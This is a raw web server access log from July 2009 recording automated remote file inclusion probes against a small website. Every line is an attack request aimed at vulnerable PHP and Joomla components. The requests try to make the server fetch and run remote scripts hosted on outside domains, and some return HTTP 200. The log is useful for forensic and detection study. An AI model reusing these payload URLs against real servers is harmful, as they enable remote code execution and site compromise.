218.38.136.251 - - [04/Jul/2009:13:35:15 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:13:35:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:13:35:15 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:13:35:51 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:25 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:26 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:26 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:27 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:27 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:28 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:40 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:40 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:40 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:42 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:42 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:42 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:49 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:49 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:50 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:55 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:55 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:37:55 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:56 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:56 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:37:56 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:42:04 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:42:16 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:42:19 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:42:19 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:42:23 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:42:33 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.205.57.2 - - [04/Jul/2009:13:42:38 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "hellionindustries.com"
210.205.57.2 - - [04/Jul/2009:13:42:38 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "hellionindustries.com"
210.205.57.2 - - [04/Jul/2009:13:42:38 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:43:33 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:31 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:31 -0700] "GET /include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:31 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:38 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:38 -0700] "GET /include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:47 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:47 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:47 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:49 -0700] "GET /logs/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:49 -0700] "GET /index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:44:49 -0700] "GET /logs/access.log%20%20/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:44:58 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:04 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:04 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:04 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:20 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:20 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:45:20 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:46:19 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:46:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:46:19 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:27 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:27 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:34 -0700] "GET /logs/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:34 -0700] "GET /logs/access.log%20%20/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:46:34 -0700] "GET /index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:46:43 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:13:47:24 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:47:38 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:09 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:09 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:09 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:55 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:56 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:48:56 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:51:19 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:51:21 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:51:21 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:28 -0700] "GET /logs/access_090212.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:28 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:28 -0700] "GET /logs//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1515 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:30 -0700] "GET /logs/access_090212.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:30 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:13:51:30 -0700] "GET /logs//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1515 "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:52:05 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:52:12 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:52:24 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:52:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:13:52:24 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:13:52:26 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:13:52:26 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:13:52:26 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:52:34 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:13:53:02 -0700] "GET /index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:13:53:02 -0700] "GET /logs/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:13:53:02 -0700] "GET /logs/access.log%20%20/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:13:54:44 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:56:08 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:13:56:33 -0700] "GET /include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:13:56:33 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [04/Jul/2009:13:56:33 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:56:35 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:58:35 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:58:35 -0700] "GET /logs//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:58:35 -0700] "GET /?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:13:58:38 -0700] "GET /logs/access.log/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:58:54 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:02:34 -0700] "GET /logs/access.log%20%20/?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:02:34 -0700] "GET /?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:14:02:34 -0700] "GET /logs/?sourcedir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:13 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:13 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:13 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:30 -0700] "GET //include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:30 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:14:05:30 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
80.237.155.83 - - [04/Jul/2009:14:10:06 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
